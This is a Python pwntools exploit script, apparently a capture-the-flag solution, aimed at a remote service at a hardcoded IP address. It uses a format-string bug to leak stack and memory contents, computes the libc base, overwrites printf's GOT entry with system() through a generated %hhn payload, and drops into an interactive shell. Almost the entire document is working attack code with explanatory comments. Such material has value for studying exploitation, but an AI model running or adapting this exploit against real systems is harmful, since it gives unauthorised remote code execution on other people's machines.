from pwn import *
# Remote service this script talks to (values as given on the page).
host = '78.46.224.86'
port = 1337
# pwntools context; the packing helpers used below (p64/u64) follow it.
context.os = 'linux'
context.arch = 'amd64'
# One connection, opened at import time and reused by every helper below
# (module-level side effect: the script talks to the network as soon as it loads).
p = remote(host, port)
def dump_stack(at=None, n=2048):
    """Read ``n // 8`` stack words back through the service's format-string echo.

    Args:
        at: first positional printf argument to read (``%<at>$p``); when falsy
            (``None`` or ``0``) the sequential form ``.%p`` repeated is used.
        n: byte budget; one 8-byte word is requested per 8 bytes of ``n``.

    Returns:
        List of ints, one per echoed field, with ``(nil)`` mapped to 0.  Relies
        on Python 2 ``map`` returning a list (the module-level caller indexes it).
    """
    pl = ""
    if at:
        # One positional read per word; "." separates the echoed fields.
        for i in range(n // 8):
            pl += "%{}$p.".format(at + i)
    else:
        pl = ".%p" * (n // 8)
    # Marker so readuntil() knows where the echoed reply ends.
    pl += "END"
    p.sendline(pl)
    # [:-3] drops the 3-byte "END" marker; the strips remove surrounding separators.
    x = p.readuntil("END")[:-3].strip().strip(".")
    # NOTE(review): the first "."-separated field is discarded here, so element 0
    # of the result is the second echoed word — presumably the service prints
    # something ahead of the first %p; confirm against its actual output.
    stack_leak = x.split(".")[1:]
    stack_leak = map(lambda y: 0 if "nil" in y else int(y, 16), stack_leak)
    return stack_leak
def fmtleaker(addr):
    """Read the bytes stored at ``addr`` with a single ``%8$s`` format-string read.

    The payload places ``addr`` after the format text so that it is the 8th
    positional argument (the fixed ``8`` is an assumption about where the sent
    buffer sits on the stack — TODO confirm), and brackets the dereferenced
    string between ``AAAA`` and ``.ENDBBBB`` so it can be cut out of the echo.

    Args:
        addr: address to read from.

    Returns:
        The bytes found at ``addr`` up to the first NUL (a ``str``); the single
        byte ``"\\x00"`` when the cut-out is empty (the first byte itself is NUL);
        ``None`` when ``addr`` contains a newline byte, the reply was empty, or
        all three attempts ended in EOF / another exception.
    """
    log.debug("leaking addr 0x{:x}".format(addr))
    # vp is never assigned (the remote() below is commented out), so the
    # close() in the finally block is a no-op.
    vp = None
    # Only the exception paths fall through to the next attempt; every
    # non-exception path returns from inside the try.
    for i in range(3):
        try:
            #vp = remote(host, port)
            pl = "AAAA%8$s.ENDBBBB"
            pl += p64(addr)
            # A 0x0a byte inside the packed address would end the line early
            # (sendline is line-oriented), so such addresses are refused.
            if "\n" in pl:
                log.warning("newline in payload!")
                return None
            p.sendline(pl)
            x = p.recv(1024)
            if x:
                # Cut out everything between the two markers.
                f = x.find("AAAA") + 4
                l = x.find(".ENDBBBB")
                res = x[f:l]
                if res == "":
                    # %s printed nothing: the byte at addr is NUL.
                    return "\x00"
                else:
                    return res
            return None
        except KeyboardInterrupt:
            raise
        except EOFError:
            log.debug("got EOF for leaking addr 0x{:x}".format(addr))
            pass
        except Exception:
            # `sys` is expected to arrive via `from pwn import *`.
            log.warning("got exception...", exc_info=sys.exc_info())
        finally:
            if vp:
                vp.close()
    return None
def print_got():
    """Print three consecutive 8-byte GOT entries starting at ``bin_got_addr``.

    Each entry is assembled from repeated :func:`fmtleaker` reads, because a
    ``%s`` read stops at the first NUL and so may return fewer than 8 bytes;
    a byte that cannot be read is filled with ``"\\xff"`` so the loop still
    terminates.  Uses the module-level ``bin_got_addr`` and Python 2 semantics
    (``print`` statement, ``str`` holding raw bytes).
    """
    for off in range(3):
        leaked = ''
        while len(leaked) < 8:
            # Resume the read right after the bytes collected so far.
            addr = bin_got_addr + len(leaked)
            x = fmtleaker(addr+off*8)
            if x:
                leaked += x
            else:
                # Unreadable byte: 0xff is a visible placeholder, not a real value.
                leaked += "\xff"
        #log.info(hexdump(leaked))
        # A read can overshoot 8 bytes; only the first word is decoded.
        print hex(bin_got_addr+off*8) + ": " + hex(u64(leaked[:8]))
# Binary layout: a fixed load base (presumably a non-PIE binary), the GOT
# 0x201000 above it and printf's slot 0x18 into the GOT.  These values are
# specific to the binary this script was written against.
bin_addr = 0x400000
bin_got_addr = bin_addr + 0x201000
printf_got = bin_got_addr + 0x18
# Offsets inside the remote's libc build: the return address into
# __libc_start_main that sits on the stack, plus the symbols/strings used
# below.  NOTE(review): only valid for the libc version the service ran.
offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0
offset_dup2 = 0x00000000000f8380
offset_read = 0x00000000000f7c60
offset_write = 0x00000000000f7cc0
offset_str_bin_sh = 0x189fc0
offset_puts = 0x0000000000070960
# Positional printf argument expected to hold the __libc_start_main return
# address; a 16-byte budget asks for two words.
# NOTE(review): dump_stack drops the first echoed field, so confirm which
# slot stack[0] really corresponds to.
libc_index = 37
stack = dump_stack(libc_index, 16)
libc_stack = stack[0]
# Rebase: libc base = leaked return address - that address's offset in libc.
libc_address = libc_stack - offset___libc_start_main_ret
libc_bin_sh = libc_address + offset_str_bin_sh
libc_system = libc_address + offset_system
libc_puts = libc_address + offset_puts
log.info("libc_address: " + hex(libc_address))
# Reading the string back is a sanity check that the computed base is right.
log.info("libc_bin_sh: {}({})".format(hex(libc_bin_sh), fmtleaker(libc_bin_sh)))
log.info("libc_system: " + hex(libc_system))
log.info("bin_got_addr: " + hex(bin_got_addr))
log.info("printf_got: " + hex(printf_got))
log.info("got befor:")
print_got()
# Positional argument index at which the sent buffer presumably starts on
# the stack; passed to PayloadGenerator as the base for its $hhn indices.
buffer_start = 6
class PayloadGenerator:
    """Build a format-string payload that writes queued bytes with ``%hhn``.

    The payload has two parts: a format prefix that raises printf's character
    count to each byte value and then issues ``%<k>$hhn`` for it, padded to an
    8-byte boundary; then the target addresses, one 8-byte word each, in the
    same order.  The positional index ``k`` is the word offset of the matching
    address within the buffer plus ``index`` (the stack slot where the buffer
    starts).

    Attributes:
        mem: list of ``(address, byte)`` pairs queued by :meth:`write`; sorted
            in place by byte value by :meth:`payload_len` and :meth:`gen`.
        index: positional-argument base added to every ``$hhn`` index.

    Python 2 code: ``xrange``, ``str`` payloads and integer ``/`` in :meth:`gen`.
    """

    def __init__(self, index=0):
        self.mem = []
        self.index = index

    def write(self, where, what):
        """Queue the low 5 bytes of ``what`` (little-endian) for writing at ``where``.

        Only 5 bytes are queued; presumably the upper bytes at the destination
        are already zero — TODO confirm for the value being written.
        """
        for i in xrange(5):
            self.mem.append((where + i, (int(what) >> (i * 8)) & 0xFF))

    def payload_len(self):
        """Return the length of the 8-byte-padded format prefix for ``mem``.

        Builds the prefix with a placeholder index so that :meth:`gen` can
        derive the real indices from this length.  Sorts ``self.mem`` in place.
        NOTE(review): the length is only exact if the real indices have the same
        digit count as ``10 + self.index``; otherwise the padding drifts.
        """
        mem = self.mem
        payload = ''
        # Ascending byte values: the printed-character count only ever grows,
        # so each byte can be reached without wrapping.
        mem.sort(key=operator.itemgetter(1))
        printed = 0
        index = 10 #dummy value
        for addr, value in mem:
            if value != printed:
                # A wide precision emits the gap with one conversion; short
                # gaps are cheaper as literal padding characters.
                if value - printed > 8:
                    payload += "%." + str(value - printed) + "x"
                else:
                    payload += "A" * (value - printed)
                printed = value
            payload += "%" + str(index + self.index) + "$hhn"
            index += 1
        # Align to 8 so the addresses appended by gen() land on word
        # boundaries (adds a full word when already aligned).
        payload += "A" * (8 - (len(payload) % 8))
        return len(payload)

    def gen(self):
        """Return the complete payload: format prefix followed by packed addresses.

        Repeats the prefix construction of :meth:`payload_len` with the real
        positional base: the prefix length in 8-byte words (Python 2 integer
        division) plus ``self.index``.  Addresses follow in the same sorted
        order, so the n-th ``$hhn`` refers to the n-th address.
        """
        mem = self.mem
        payload = ''
        mem.sort(key=operator.itemgetter(1))
        printed = 0
        # First address word sits right after the prefix.
        index = self.payload_len() / 8
        for addr, value in mem:
            if value != printed:
                if value - printed > 8:
                    payload += "%." + str(value - printed) + "x"
                else:
                    payload += "A" * (value - printed)
                printed = value
            payload += "%" + str(index + self.index) + "$hhn"
            index += 1
        payload += "A" * (8 - (len(payload) % 8))
        for addr, value in mem:
            payload += p64(addr)
        return payload
# Queue the 5-byte overwrite of printf's GOT slot with the computed system
# address, then send the resulting payload through the same channel.  This
# presumes the GOT entry is writable at runtime (i.e. no full RELRO); with a
# read-only relocation table the write would fault instead.
gen = PayloadGenerator(buffer_start)
gen.write(printf_got, libc_system)
payload = gen.gen()
print hexdump(payload, width=8)
p.sendline(payload)
print p.recv(1024)
# Blocks until the interactive session is closed; the lines below run only then.
p.interactive()
log.info("got after: ")
print_got()